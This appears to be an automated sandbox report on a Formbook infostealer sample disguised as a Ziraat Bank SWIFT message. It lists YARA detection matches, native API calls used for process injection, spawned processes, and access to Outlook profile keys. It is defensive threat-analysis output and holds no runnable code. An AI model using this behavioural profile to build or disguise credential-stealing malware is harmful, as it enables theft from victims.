Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.451409709.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221129-34221.exe PID: 1308, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: systray.exe PID: 1312, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_01740798 2_2_01740798
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_017451AC 2_2_017451AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_01748578 2_2_01748578
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_01748588 2_2_01748588
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_017404F8 2_2_017404F8
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_017404E8 2_2_017404E8
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_01748759 2_2_01748759
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_01740789 2_2_01740789
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05496E40 2_2_05496E40
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05496E50 2_2_05496E50
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05495474 2_2_05495474
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_0549F0C0 2_2_0549F0C0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_0549F0AF 2_2_0549F0AF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05FEA3F9 2_2_05FEA3F9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05FEAFC0 2_2_05FEAFC0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05FEAFBA 2_2_05FEAFBA
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05FEEEB0 2_2_05FEEEB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 2_2_05FEEEA2 2_2_05FEEEA2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01294120 6_2_01294120
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127F900 6_2_0127F900
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012999BF 6_2_012999BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0134E824 6_2_0134E824
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331002 6_2_01331002
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013420A8 6_2_013420A8
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B090 6_2_0128B090
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013428EC 6_2_013428EC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01342B28 6_2_01342B28
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129AB40 6_2_0129AB40
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AEBB0 6_2_012AEBB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133DBD2 6_2_0133DBD2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013303DA 6_2_013303DA
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132FA2B 6_2_0132FA2B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013422AE 6_2_013422AE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01270D20 6_2_01270D20
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01342D07 6_2_01342D07
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01341D55 6_2_01341D55
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128D5E0 6_2_0128D5E0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013425DD 6_2_013425DD
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128841F 6_2_0128841F
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133D466 6_2_0133D466
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01341FF1 6_2_01341FF1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0134DFCE 6_2_0134DFCE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01296E30 6_2_01296E30
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133D616 6_2_0133D616
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01342EF7 6_2_01342EF7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004012AC 6_2_004012AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004228FF 6_2_004228FF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_00422330 6_2_00422330
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0040B447 6_2_0040B447
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004044C7 6_2_004044C7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004044BE 6_2_004044BE
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0042258E 6_2_0042258E
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0040FE77 6_2_0040FE77
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004046E7 6_2_004046E7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: String function: 0127B150 appears 72 times
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_012B9910
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B99A0 NtCreateSection,LdrInitializeThunk, 6_2_012B99A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_012B9860
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9840 NtDelayExecution,LdrInitializeThunk, 6_2_012B9840
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B98F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_012B98F0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A20 NtResumeThread,LdrInitializeThunk, 6_2_012B9A20
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_012B9A00
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A50 NtCreateFile,LdrInitializeThunk, 6_2_012B9A50
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9540 NtReadFile,LdrInitializeThunk, 6_2_012B9540
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B95D0 NtClose,LdrInitializeThunk, 6_2_012B95D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_012B9710
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_012B97A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_012B9780
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_012B9FE0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_012B9660
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_012B96E0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9950 NtQueueApcThread, 6_2_012B9950
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B99D0 NtCreateProcessEx, 6_2_012B99D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9820 NtEnumerateKey, 6_2_012B9820
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BB040 NtSuspendThread, 6_2_012BB040
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B98A0 NtWriteVirtualMemory, 6_2_012B98A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9B00 NtSetValueKey, 6_2_012B9B00
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BA3B0 NtGetContextThread, 6_2_012BA3B0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A10 NtQuerySection, 6_2_012B9A10
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9A80 NtOpenDirectoryObject, 6_2_012B9A80
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9520 NtWaitForSingleObject, 6_2_012B9520
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BAD30 NtSetContextThread, 6_2_012BAD30
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9560 NtWriteFile, 6_2_012B9560
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B95F0 NtQueryInformationFile, 6_2_012B95F0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9730 NtQueryVirtualMemory, 6_2_012B9730
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BA710 NtOpenProcessToken, 6_2_012BA710
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9760 NtOpenProcess, 6_2_012B9760
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012BA770 NtOpenThread, 6_2_012BA770
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9770 NtSetInformationFile, 6_2_012B9770
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9610 NtEnumerateValueKey, 6_2_012B9610
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9670 NtQueryInformationProcess, 6_2_012B9670
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9650 NtQueryValueKey, 6_2_012B9650
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B96D0 NtCreateKey, 6_2_012B96D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041E057 NtAllocateVirtualMemory, 6_2_0041E057
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004012AC NtProtectVirtualMemory, 6_2_004012AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DE77 NtCreateFile, 6_2_0041DE77
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DF27 NtReadFile, 6_2_0041DF27
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DFA7 NtClose, 6_2_0041DFA7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_004014E9 NtProtectVirtualMemory, 6_2_004014E9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0041DFA1 NtClose, 6_2_0041DFA1
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000000.289716737.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebqbz.exe< vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.338665766.0000000007830000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCollins.dll8 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.331494195.0000000004121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCollins.dll8 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.338561208.00000000076C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePrecision.dll6 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.338627282.00000000076E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameInspector.dllN vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrecision.dll6 vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.329721340.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameInspector.dllN vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.453382489.000000000136F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.328808477.00000000011D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.318980299.000000000102D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Binary or memory string: OriginalFilenamebqbz.exe< vs Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Virustotal: Detection: 44%
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe ReversingLabs: Detection: 39%
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ziraat Bankasi Swift Mesaji20221129-34221.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File created: C:\Users\user\AppData\Local\Temp\q3W1-4699 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/4
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/J5dcUKfIRNXI7lm7dD.cs Cryptographic APIs: 'CreateDecryptor'
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, rvdJXTHHMJjcnIgtsf/J5dcUKfIRNXI7lm7dD.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000002.451564221.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000006.00000003.323677233.00000000010BA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.450849283.0000000000CEA000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000003.453208658.0000000004434000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.562757134.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, systray.exe, 0000000A.00000002.563719254.00000000046EF000.00000040.00000800.00020000.00000000.sdmp
